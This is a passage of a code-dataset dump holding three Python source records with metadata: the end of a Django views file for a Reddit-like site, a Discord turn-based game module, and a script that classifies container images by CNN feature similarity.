int(request.POST.get('parentpost_id'))\n parent_comment = None\n try:\n parentcomment_id = int(request.POST.get('parentcomment_id'))\n parent_comment = Comment.objects.get(pk = parentcomment_id)\n except Exception:\n parent_comment = None \n\n comm = Comment(text = text, parent_post = Post.objects.get(pk = parentpost_id), \n parent_comment = parent_comment,\n user= request.user, published_date = timezone.now())\n comm.save()\n return render(request, 'sub/comment_box.html',{'comment':comm})\n\n return Http404\n\ndef give_point(request):\n if request.method == 'GET':\n obj_id = request.GET['post_id']\n arrow_dir = request.GET['arrow_dir']\n what_type = request.GET['what_type']\n obj = None\n\n if what_type == \"post\":\n obj = Post.objects.get(pk=int(obj_id))\n elif what_type == \"comment\": \n obj = Comment.objects.get(pk=int(obj_id))\n \n if obj != None: \n if arrow_dir == \"true\": \n obj.point_up()\n else:\n obj.point_down()\n\n return HttpResponse(obj.points)", "repo_name": "Outsidev/rezzit-django", "sub_path": "subreddapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Post.objects.annotate", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.objects.annotate", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Post.objects.annotate", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Post.objects.annotate", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 56, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 61, "usage_type": "call"}, {"api_name": "forms.UserProfileForm", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 76, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "django.template.TemplateDoesNotExist", "line_number": 83, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 84, "usage_type": "name"}, {"api_name": "forms.PostForm", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Comment.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 104, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Post.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 110, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 114, "usage_type": "name"}, {"api_name": "models.Post.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Comment.objects.get", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 126, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "20517209550", "text": "import asyncio\n\nfrom modules.player import Player\nfrom modules.enemy import Enemy\nfrom modules import template\n\ngame_state = { \"NEW\": \"NEW\", \"PLAYING\": \"PLAYING\", \"ENDED\": \"ENDED\" }\n\nclass Game:\n\n def __init__(self, guild, channel):\n self.players = []\n self.guild = guild\n self.channel = channel\n self.state = game_state[\"NEW\"]\n self.active = None\n\n def get_player(self, author):\n for i, o in enumerate(self.players):\n if o.type == \"PLAYER\" and o.author == author:\n return self.players[i]\n return None\n\n def get_npc_by_name(self, name):\n for i, o in enumerate(self.players):\n if o.type == \"NPC\" and o.name == name:\n return self.players[i]\n return None\n\n async def add_player(self, ctx, player):\n self.players.append(player)\n\n if ctx:\n msg = \"{name} has entered the game.\".format(name=player.name)\n await ctx.channel.send(msg)\n await asyncio.sleep(.5)\n\n def kick_player(self, player):\n for i, o in enumerate(self.players):\n if o == player:\n del self.players[i]\n break\n return\n\n def get_readable_player_status(self, player):\n return \"{name} {hp}/{max_hp}HP {ap}/{max_ap}AP\".format(\n name=player.name,\n hp=player.hp,max_hp=player.max_hp,\n ap=player.ap,\n max_ap=player.max_ap\n )\n\n def get_game_status(self):\n statuses = []\n for i, o in enumerate(self.players):\n statuses.append(self.get_readable_player_status(o))\n return \"\\n\".join(statuses)\n\n async def start(self, ctx):\n self.state = game_state[\"PLAYING\"]\n self.active = 0\n await self.next_turn(ctx)\n return\n\n def mark_next_player_active(self):\n if self.active == len(self.players) - 1:\n self.active = 0\n else:\n self.active += 1\n\n async def next_turn(self, ctx):\n player = self.players[self.active]\n msg = \"It is {name}'s turn.\".format(name=player.name)\n await ctx.channel.send(msg)\n await asyncio.sleep(2)\n if player.type == \"NPC\":\n await player.attack(ctx)\n await asyncio.sleep(2)\n self.mark_next_player_active()\n await self.next_turn(ctx)\n\n return\n\n async def init_template(self, ctx, name):\n await template.init_template(ctx, self, name)", "repo_name": "drikusroor/ainabs-lair", "sub_path": "modules/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 2218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.template.init_template", "line_number": 85, "usage_type": "call"}, {"api_name": "modules.template", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "16756479264", "text": "import cv2\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import models\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\n\nfrom scipy.spatial import distance\nimport time\nfrom detect_notch import OrientationDetection\ntry:\n from lib.warp_and_reverse_warp import warp_polar, reverse_warp\nexcept:\n from .lib.warp_and_reverse_warp import warp_polar, reverse_warp\n\nimport json\nfrom easydict import EasyDict\nfrom pathlib import Path\n\ndef preprocess( img, crop_circle, resize_ratio = 0.3):\n '''\n\n :param img:\n :param crop_circle:\n :return:\n '''\n\n img = cv2.resize(img, (int(img.shape[1] * resize_ratio), int(img.shape[0] * resize_ratio)))\n ### warp\n img, warp = warp_polar(img, crop_circle)\n reversed_warp = reverse_warp(img, warp, crop_circle)\n ### crop\n reversed_warp = reversed_warp[int(crop_circle[1] - crop_circle[2]):int(crop_circle[1] + crop_circle[2]),\n int(crop_circle[0] - crop_circle[2]):int(crop_circle[0] + crop_circle[2])]\n return reversed_warp\n\nclass FeatureVisualization():\n def __init__(self, index=0, selected_layer=0, model = \"vgg\", json_path = \"config/classification.json\", features_path = \"\"):\n\n\n try:\n with Path(json_path).open(\"r\") as f:\n self.opt = json.load(f)\n self.opt = EasyDict(self.opt)\n print(self.opt)\n except:\n print(\" No file {}\".format(json_path))\n\n self.folder_ref = self.opt.folder_ref\n try:\n self.names_ref = os.listdir(folder_ref)\n except:\n print(\"The directory {} is not exist \".format(folder_ref))\n raise\n self.debug = self.opt.debug.lower() in (\"yes\", \"true\", \"t\", \"1\")\n self.circle_platfrom = self.opt.crop_circle_platform\n self.crop_circle = self.opt[\"crop_circle\"].lower() in [\"t\", \"true\", \"True\"]\n\n self.index = index\n # self.img_path = img_path\n self.selected_layer = selected_layer\n self.modelnames = [\"vgg16\",\"mobilenet_v2\",\"densenet121\",\"densenet121\",\"densenet201\",\"resnext50_32x4d\",\"vgg19\",\"alexnet\",\"squeezenet1_1\",\"mnasnet1_0\"]\n if model == \"vgg16\":\n # Load pretrained model\n self.pretrained_model = models.vgg16(pretrained=True)\n # print(self.pretrained_model)\n self.pretrained_model2 = models.vgg16(pretrained=True)\n elif model == \"mobilenet_v2\":\n self.pretrained_model = models.mobilenet_v2(pretrained=True)\n self.pretrained_model2 = models.mobilenet_v2(pretrained=True)\n\n elif model == \"densenet121\":\n self.pretrained_model = models.densenet121(pretrained=True)\n self.pretrained_model2 = models.densenet121(pretrained=True)\n\n elif model == \"densenet201\":\n self.pretrained_model = models.densenet201(pretrained=True)\n self.pretrained_model2 = models.densenet201(pretrained=True)\n\n elif model == \"resnext50_32x4d\":\n self.pretrained_model = models.resnext50_32x4d(pretrained=True)\n self.pretrained_model2 = models.resnext50_32x4d(pretrained=True)\n\n elif model == \"vgg19\":\n self.pretrained_model = models.vgg19(pretrained=True)\n self.pretrained_model2 = models.vgg19(pretrained=True)\n\n elif model == \"alexnet\":\n self.pretrained_model = models.alexnet(pretrained=True)\n self.pretrained_model2 = models.alexnet(pretrained=True)\n\n elif model == \"squeezenet1_1\":\n self.pretrained_model = models.squeezenet1_1(pretrained=True)\n self.pretrained_model2 = models.squeezenet1_1(pretrained=True)\n\n elif model == \"mnasnet1_0\":\n self.pretrained_model = models.wide_resnet101_2(pretrained=True)\n self.pretrained_model2 = models.wide_resnet101_2(pretrained=True)\n\n\n else:\n # Load pretrained model\n self.pretrained_model = models.vgg16(pretrained=True)\n # print(self.pretrained_model)\n self.pretrained_model2 = models.vgg16(pretrained=True)\n print(\"vgg\")\n\n self.cuda_is_avalible = torch.cuda.is_available()\n print(self.cuda_is_avalible)\n if self.cuda_is_avalible:\n self.pretrained_model.to(torch.device(\"cuda:0\"))\n self.pretrained_model2.to(torch.device(\"cuda:0\"))\n\n\n ## initialize the data\n try:\n # Read the JSON file\n with open(features_path, \"r\") as file:\n json_data = file.read()\n # Parse the JSON data into a dictionary\n self.names_result = json.loads(json_data)\n self.names_ref = list(self.names_result.keys())\n print(\"READ feature file successfully \")\n\n\n except:\n\n self.get_imgs_in_ref_score()\n features_result_path = f\"./config/features_result_{model}.json\"\n print(self.names_result_save)\n with open(features_result_path, 'w') as file:\n json.dump(self.names_result_save, file)\n\n print(\"Dictionary saved as JSON successfully.\")\n\n\n def get_imgs_in_ref_score(self):\n names_result = {}\n names_result_save = {}\n print(\"self.names_ref\",self.names_ref)\n\n key = 0\n for j in range(len(self.names_ref)):\n img2 = cv2.imread(os.path.join(self.opt.folder_ref, self.names_ref[j]))\n\n if self.crop_circle is True:\n\n img2 = preprocess(img2, self.circle_platfrom, resize_ratio= 0.3)\n\n # cv2.imshow(\"see_crop\", img2)\n # key = cv2.waitKey(int(key))\n # print(\"0\")\n # imgasvar = featureVis.preprocess_image(img2)\n self.set_index(j)\n outputs2 = self.get_fc_feature(img2)\n # self.plot_probablity(outputs2)\n\n # names_result[self.names_ref[j]] = outputs2\n names_result_save[self.names_ref[j]] = outputs2.cpu().tolist()\n\n self.names_result_save = names_result_save\n self.names_result = names_result_save\n\n return names_result\n\n # @staticmethod\n def preprocess_image(self, cv2im, resize_im=True):\n # print(len(cv2im))\n # Resize image\n if resize_im:\n cv2im = cv2.resize(cv2im, (224, 224))\n im_as_arr = np.float32(cv2im)\n im_as_arr = np.ascontiguousarray(im_as_arr[..., ::-1])\n im_as_arr = im_as_arr.transpose(2, 0, 1) # Convert array to D,W,H\n # Normalize the channels\n for channel, _ in enumerate(im_as_arr):\n im_as_arr[channel] /= 255\n # Convert to float tensor\n im_as_ten = torch.from_numpy(im_as_arr).float()\n # Add one more channel to the beginning. Tensor shape = 1,3,224,224\n im_as_ten.unsqueeze_(0)\n # Convert to Pytorch variable\n im_as_var = Variable(im_as_ten, requires_grad=False)\n if self.cuda_is_avalible:\n im_as_var = im_as_var.to(torch.device(\"cuda:0\"))\n return im_as_var\n def set_index(self, index):\n self.index = index\n\n def process_image(self, img):\n # print('input image:')\n img = self.preprocess_image(img)\n return img\n\n def get_feature(self,img):\n # Image preprocessing\n input = self.process_image(img)\n # print(\"input.shape:{}\".format(input.shape))\n x = input\n self.pretrained_model.eval()\n with torch.no_grad():\n for index, layer in enumerate(self.pretrained_model):\n x = layer(x)\n # print(\"{}:{}\".format(index,x.shape))\n if (index == self.selected_layer):\n return x\n\n def get_conv_feature(self,img):\n # Get the feature map\n features = self.get_feature(img)\n result_path = './feat_' + str(self.selected_layer)\n\n if not os.path.exists(result_path):\n os.makedirs(result_path)\n\n def plot_probablity(self, outputs):\n outputs = outputs.cpu()\n outputs = outputs.data.numpy()\n # print(outputs.shape)\n outputs = np.ndarray.tolist(outputs)\n # print(type(outputs),outputs)\n # print(len(outputs[0]))\n # x = range(0, 4096)\n\n # plt.bar(x, outputs[0])\n # plt.xlabel(\"Dimension\")\n # plt.ylabel(\"Value\")\n # plt.title(\"FC feature {}\".format(str(self.index)))\n # plt.show()\n\n def get_fc_feature(self,img):\n input = self.process_image(img)\n self.pretrained_model2.eval()\n # self.pretrained_model2.classifier = nn.Sequential(*list(self.pretrained_model2.classifier.children())[0:4])\n with torch.no_grad():\n outputs = self.pretrained_model2(input)\n # self.plot_probablity(outputs)\n return outputs\n\n def compare_cosine(self, out1, out2, metric = None):\n\n '''\n metric = 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',\n 'sqeuclidean', 'wminkowski', 'yule'.\n :param out1:\n :param out2:\n :return:\n '''\n metric_list = ['braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',\n 'sqeuclidean', 'wminkowski', 'yule']\n if metric not in metric_list:\n metric = 'cosine'\n\n try:\n out1 = out1.cpu()\n except:\n out1 = out1\n\n try:\n out2 = out2.cpu()\n except:\n out2 = out2\n cosineDistance = distance.cdist(out1, out2, metric)[0]\n return cosineDistance\n\n def compare_cosine_all(self, out1, out2):\n metric = 'cosine'\n out1 = out1.cpu()\n out2 = out2.cpu()\n cosineDistance = distance.cdist(out1, out2, metric)\n return cosineDistance\n\n\n def get_similar_img(self, img1, metric = \"\"):\n '''\n to get similar image\n :param img1:\n :return:\n '''\n if self.debug:\n cv2.putText(img1, \"INPUT\", (0, img1.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3, (200, 200, 0), 3)\n cv2.imshow(\"1\", img1)\n # imgasvar = self.preprocess_image(img1)\n outputs1 = self.get_fc_feature(img1)\n # print(\"outputs1\", outputs1)\n self.plot_probablity(outputs1)\n # print(\"outputs1\", outputs1)\n result = []\n for j, name in enumerate(self.names_result.keys()):\n dis = self.compare_cosine(outputs1, self.names_result[name],metric = metric)\n result.append(dis[0])\n dis_all = self.compare_cosine(outputs1, self.names_result[name],metric = metric )\n print(name, \"dis_all: \", dis_all)\n\n result_array = np.asarray(result)\n ind = np.argmin(result_array)\n print(self.names_ref)\n print(ind)\n try:\n class_obj = self.names_ref[ind].split(\"_\")[0]\n except:\n class_obj = self.names_ref[ind]\n print(\"The class is {}\".format(class_obj))\n # print(os.path.join(self.folder_ref, self.names_ref[ind]))\n answer = cv2.imread(os.path.join(self.folder_ref, self.names_ref[ind]))\n if self.debug:\n cv2.putText(answer, \"ANSWER {}\".format(str(class_obj)), (0, answer.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3.5, (50, 0, 200), 3)\n cv2.imshow(\"answer_class\", answer)\n cv2.waitKey(0)\n\n return class_obj\n\n\n def get_similar_n_img(self, img1, metric = \"\", get_n_imge = 5):\n '''\n to get similar image\n :param img1:\n :return:\n '''\n if self.debug:\n cv2.putText(img1, \"INPUT\", (0, img1.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3, (200, 200, 0), 3)\n cv2.imshow(\"1\", img1)\n # imgasvar = self.preprocess_image(img1)\n outputs1 = self.get_fc_feature(img1)\n # print(\"outputs1\", outputs1)\n self.plot_probablity(outputs1)\n # print(\"outputs1\", outputs1)\n result = []\n for j, name in enumerate(self.names_result.keys()):\n dis = self.compare_cosine(outputs1, self.names_result[name],metric = metric)\n result.append(dis[0])\n dis_all = self.compare_cosine(outputs1, self.names_result[name],metric = metric )\n print(name, \"dis_all: \", dis_all)\n\n result_array = np.asarray(result)\n\n n_result = []\n n_ind_result = []\n\n for n_result_index in range(get_n_imge):\n\n ind = np.argmin(result_array)\n n_ind_result.append(ind)\n\n try:\n n_result.append(self.names_ref[ind].split(\"_\")[0])\n except:\n n_result.append(self.names_ref[ind])\n\n result_array[ind] = 999\n\n print(\"The class is {}\".format(n_result[-1]))\n # print(os.path.join(self.folder_ref, self.names_ref[ind]))\n answer = cv2.imread(os.path.join(self.folder_ref, self.names_ref[n_ind_result[0]]))\n if self.debug:\n cv2.putText(answer, \"ANSWER {}\".format(str(n_result[-1])), (0, answer.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3.5, (50, 0, 200), 3)\n cv2.imshow(\"answer_class\", answer)\n cv2.waitKey(0)\n\n return n_result\n\n\n\nif __name__ == '__main__':\n folder = \"F:\\Pawat\\Projects\\Imageprocessing_Vistools\\data\\container\\image\\Darker - Exposure time 120000us close some ambient light\"\n folder = \"F:\\Ph.D\\circle_classification\\Images_all_class\\\\0_all_class\"\n folder = \"dataset\\class_registeration\"\n folder = \"dataset\\\\20230311\"\n folder_ref = \"F:\\Pawat\\Projects\\Imageprocessing_Vistools\\data\\container\\\\light2_class\"\n folder_ref = \"F:\\Ph.D\\circle_classification\\Images_all_class\\\\0_all_class_aug\"\n folder_ref = \"dataset\\class_registeration\"\n folder_ref = \"dataset\\\\20230311\"\n\n names = os.listdir(folder)\n names_ref = os.listdir(folder_ref)\n i = 0\n j = 0\n\n\n ### fill the other object\n # orientation_detection_A = OrientationDetection( path=os.path.join(folder, names[i]), json_path=\"config/notch_config_A.json\")\n # ## EX\n # orientation_detection_B = OrientationDetection( path=os.path.join(folder, names[i]), json_path=\"config/notch_config_B.json\")\n\n\n\n def resize_scale(img, scale=0.3):\n resize = cv2.resize(img, (int(img.shape[1] * scale), int(img.shape[0] * scale)))\n return resize\n\n def test_model_and_acc(model = \"\" ,metric = \"\", crop_circle = []):\n fea_path = f\"config/features_result_{model}.json\"\n featureVis = FeatureVisualization(model = model, features_path= fea_path)\n all_result = []\n cv2.namedWindow(\"1\",cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"answer_class\",cv2.WINDOW_NORMAL)\n val_result = []\n for i in range(len(names)):\n result = []\n img1 = cv2.imread(os.path.join(folder, names[i]))\n img1 = preprocess(img1, featureVis.circle_platfrom)\n # img1 = preprocess(img1, orientation_detection_A.crop_circle_platform)\n # img1 = cv2.rotate(img1,cv2.ROTATE_90_COUNTERCLOCKWISE)\n name_class = featureVis.get_similar_img(img1, metric= metric)\n name_classes = featureVis.get_similar_n_img(img1, metric = metric , get_n_imge=5)\n print(name_classes)\n if name_class in names[i]:\n val_result.append(True)\n else:\n val_result.append(False)\n all_result.append(result)\n count_true = val_result.count(True)\n acc = (count_true/ len(val_result)) *100\n print(str(acc) + \"% accuracy\")\n return acc\n\n def test_an_image(img, model = None):\n\n fea_path = f\"config/features_result_{model}.json\"\n featureVis = FeatureVisualization(model = model, features_path= fea_path)\n\n if type(img) == \"String\":\n img1 = cv2.imread(img)\n else:\n img1 = img\n img1 = preprocess(img1, featureVis.circle_platfrom)\n name_classes = featureVis.get_similar_n_img(img1, metric=metric, get_n_imge= 5)\n\n print(name_classes)\n\n modelnames = [\"mobilenet_v2\", \"densenet121\", \"densenet121\", \"densenet201\", \"resnext50_32x4d\",\n \"vgg19\", \"alexnet\", \"squeezenet1_1\", \"mnasnet1_0\"]\n ''' metric = 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',\n 'sqeuclidean', 'wminkowski', 'yule'.'''\n metric = \"cosine\"\n metrics = [\"cosine\", \"euclidean\",'sqeuclidean','seuclidean','matching']\n\n model_result = {}\n featureVis = FeatureVisualization(features_path=\"config/features_result.json\")\n model_result[\"dataset\"] = featureVis.folder_ref\n\n\n with open(\"config/classification.json\", \"r\") as file:\n json_data_classification = file.read()\n model_result[\"config\"] = json.loads(json_data_classification)\n\n\n print(model_result)\n for metric in metrics:\n for modelname in modelnames:\n print(\"model: \", modelname)\n acc = test_model_and_acc(model = modelname, metric = metric)\n model_result[modelname] = acc\n\n print(model_result)\n\n\n\n with open(f\"model_result_{metric}.json\", \"w\") as file:\n json.dump(model_result, file)\n print(\"READ feature file successfully \")\n\n", "repo_name": "PudPawat/container-orientation-detection", "sub_path": "compareimg_val.py", "file_name": "compareimg_val.py", "file_ext": "py", "file_size_in_byte": 17777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.resize", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.warp_and_reverse_warp.warp_polar", "line_number": 33, "usage_type": "call"}, {"api_name": "lib.warp_and_reverse_warp.reverse_warp", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}, {"api_name": "easydict.EasyDict", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.models.vgg16", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 68, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 70, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 70, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenet_v2", "line_number": 72, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 72, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenet_v2", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 77, "usage_type": "name"}, {"api_name": "torchvision.models.densenet201", "line_number": 80, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 80, "usage_type": "name"}, {"api_name": "torchvision.models.densenet201", "line_number": 81, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 81, "usage_type": "name"}, {"api_name": "torchvision.models.resnext50_32x4d", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.models.resnext50_32x4d", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 88, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 89, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 92, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 92, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 93, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 93, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_1", "line_number": 96, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 96, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_1", "line_number": 97, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 97, "usage_type": "name"}, {"api_name": "torchvision.models.wide_resnet101_2", "line_number": 100, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 100, "usage_type": "name"}, {"api_name": "torchvision.models.wide_resnet101_2", "line_number": 101, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 101, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 106, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 106, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 115, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.ndarray.tolist", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 223, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 238, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 272, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 272, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 279, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 279, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 290, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 290, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 305, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 316, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 316, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 317, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 318, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 330, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 330, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 351, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path", "line_number": 363, "usage_type": "attribute"}, {"api_name": "cv2.putText", 